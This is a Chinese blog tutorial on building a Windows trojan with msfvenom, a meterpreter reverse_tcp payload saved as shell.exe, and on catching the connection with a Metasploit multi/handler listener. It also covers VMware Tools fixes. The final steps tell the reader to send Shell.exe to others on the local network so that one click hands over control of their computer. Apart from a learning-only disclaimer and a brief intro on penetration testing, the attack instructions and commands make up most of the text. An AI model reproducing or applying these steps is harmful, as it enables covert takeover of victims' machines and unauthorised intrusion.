免责声明：
本文所介绍的内容仅做学习交流使用，严禁利用文中技术进行非法行为，否则造成一切严重后果自负！

简介：

黑客技术里的渗透是指黑客通过非法途径入侵网站系统，拿到网站的WebShell进行非法操作。也指信息安全风险评估

风险评估（Risk Assessment）存在于很多行业，但在IT业，独指信息安全风险评估，指依据有关信息技术标准，对信息系统及由其处理、传输和存储的信息的保密性、完整性和可用性（CIA）等安全属性进行科学、公正的综合评估的过程。它要评估信息系统的脆弱性、信息系统面临的威胁以及脆弱性被威胁源利用后所产生的实际负面影响，并根据安全事件发生的可能性和负面影响的程度来识别信息系统的安全风险。渗透测试（Penetration Testing）则是从一个攻击者的角度来检查和审核一个网络系统的安全性的过程。这本来是风险评估的一部分（存在于执行阶段），不应该与风险评估相提并论。但风险评估是一个过于庞大和复杂的体系，在如此短的篇幅里不能够完全详述，所以把渗透测试这一个富有争议性、纯技术的并且也是可以从风险评估中分离出来的内容单独分离了出来。

vmware虚拟机安装

windows安装kali linux系统kali linux镜像安装。_大福ya的博客-CSDN博客

1、用ip a或者ifconfig查询kali 的ip记住当前Ip

2、制作木马命令：

 1.注意千万不能存入root文件不然无法拖进windows电脑

msfvenom -p windows/meterpreter/reverse_tcp lhost=刚刚的IP lport=4444 -f exe -o /home/shell.exe 

2.把制作好的.exe文件拖入电脑

 3.拖入提示这个问题

无法获取虚拟机中文件的属性。

正在取消文件复制操作。、

    1.关闭虚拟机

    2.安装VM Tools

3.Vm安装灰色方法

1.关闭虚拟机；

2.在虚拟机设置分别设置CD/DVD、CD/DVD2和软盘为自动检测三个步骤；

3.再重新启动虚拟机，灰色字即点亮。（这里的虚拟机要启动起来）

 4.安装完开启虚拟机解压当前gz

 5.解压报错解压不了

解决:

其实这个与系统无关,与VMwareTools-xxx.tar.gz的目录与有关,安装vmwareTools时是虚拟出一个光驱的，这个光驱的权限只有只读，不能向里面写入

将安装文件复制到自己本地的目录

#只能复制一份在解压才行

1  cp VMwareTools-10.3.22-15902021.tar.gz /home/dreamhai/sorftware/

2 修改文件权限(读写权限)
chmod -R 666 VMwareTools-10.3.22-15902021.tar.gz
解压缩
tar -zxvf VMwareTools-10.3.22-15902021.tar.gz

进入目录并且安装,安装有很多的选项,我这儿全部选择了默认

cd vmware-tools-distrib

安装
./vmware-install.pl

 6.解决安装完不能拖动执行下面命令 注意不能在root文件夹不然也不行其他文件夹都可以

  sudo apt install open-vm-tools

  sudo apt install open-vm-tools-desktop

 3、主路径打开命令行  不然有问题

  msfconsole

 4、设置payload，加载攻击模块设置本地IP和监听端口

 监听本地Ip端口为了是监听到.exe木马是否被点击并且连接

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 上面获取我得哪个Ip自己Ip

set LPORT 4444

show options （查看IP端口设置情况）

 run （开启监听）

 5.最后发给当前局域网的人Shell.exe

  点击一下Shell.exe就可以了

点了上面等待连接 蓝色*号就会出现命令行了就可以控制了

上面只能内网自己电脑***